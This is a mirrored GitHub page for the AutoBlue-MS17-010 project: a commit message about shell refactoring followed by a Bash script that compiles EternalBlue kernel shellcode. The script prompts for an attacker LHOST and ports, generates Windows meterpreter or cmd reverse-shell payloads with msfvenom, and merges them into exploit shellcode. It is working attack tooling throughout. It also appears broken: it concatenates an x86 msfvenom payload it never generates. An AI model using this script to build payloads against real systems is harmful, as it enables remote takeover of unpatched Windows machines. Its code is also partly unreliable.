mirror of
https://github.com/3ndG4me/AutoBlue-MS17-010
synced 2026-06-08 10:17:11 +00:00
67759ed80c
I made the following changes to improve portability, readability, and organization:
Replaced Double Square Brackets with Single Square Brackets:
Replaced [[ ... ]] with [ ... ] to ensure compatibility with various shell interpreters.
Simplified Nested If Statements:
Simplified nested if statements for better readability and clarity.
Used -p Option with read Command:
Utilized the -p option with the read command to display a prompt message directly on the same line. 💻
Consolidated Common Code:
Consolidated common code blocks to avoid repetition and improve maintainability.
66 lines
2.6 KiB
Bash
Executable File
66 lines
2.6 KiB
Bash
Executable File
#!/bin/bash
|
|
set -e
|
|
cat << "EOF"
|
|
_.-;;-._
|
|
'-..-'| || |
|
|
'-..-'|_.-;;-._|
|
|
'-..-'| || |
|
|
'-..-'|_.-''-._|
|
|
EOF
|
|
echo Eternal Blue Windows Shellcode Compiler
|
|
echo
|
|
echo Let\'s compile them windoos shellcodezzz
|
|
echo
|
|
echo Compiling x64 kernel shellcode
|
|
nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
|
|
echo 'Compiling x86 kernel shellcode'
|
|
nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
|
|
echo kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? \(Y\/n\)
|
|
read genMSF
|
|
|
|
if [ "$genMSF" = "y" ] || [ "$genMSF" = "Y" ]; then
|
|
read -p "LHOST for reverse connection: " ip
|
|
read -p "LPORT you want x64 to listen on: " portOne
|
|
read -p "LPORT you want x86 to listen on: " portTwo
|
|
|
|
read -p "Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell: " cmd
|
|
|
|
if [ "$cmd" -eq 0 ]; then
|
|
read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
|
|
if [ "$staged" -eq 0 ]; then
|
|
echo "Generating x64 meterpreter shell (staged)..."
|
|
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
|
|
elif [ "$staged" -eq 1 ]; then
|
|
echo "Generating x64 meterpreter shell (stageless)..."
|
|
msfvenom -p windows/x64/meterpreter_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
|
|
else
|
|
echo "Invalid option...exiting..."
|
|
exit 1
|
|
fi
|
|
elif [ "$cmd" -eq 1 ]; then
|
|
read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
|
|
if [ "$staged" -eq 0 ]; then
|
|
echo "Generating x64 cmd shell (staged)..."
|
|
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
|
|
elif [ "$staged" -eq 1 ]; then
|
|
echo "Generating x64 cmd shell (stageless)..."
|
|
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
|
|
else
|
|
echo "Invalid option...exiting..."
|
|
exit 1
|
|
fi
|
|
else
|
|
echo "Invalid option...exiting..."
|
|
exit 1
|
|
fi
|
|
|
|
echo "MERGING SHELLCODE WOOOO!!!"
|
|
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
|
|
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
|
|
python3 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
|
|
else
|
|
echo "Okay cool, make sure you merge your own shellcode properly :)"
|
|
fi
|
|
|
|
echo "DONE"
|
|
exit 0 |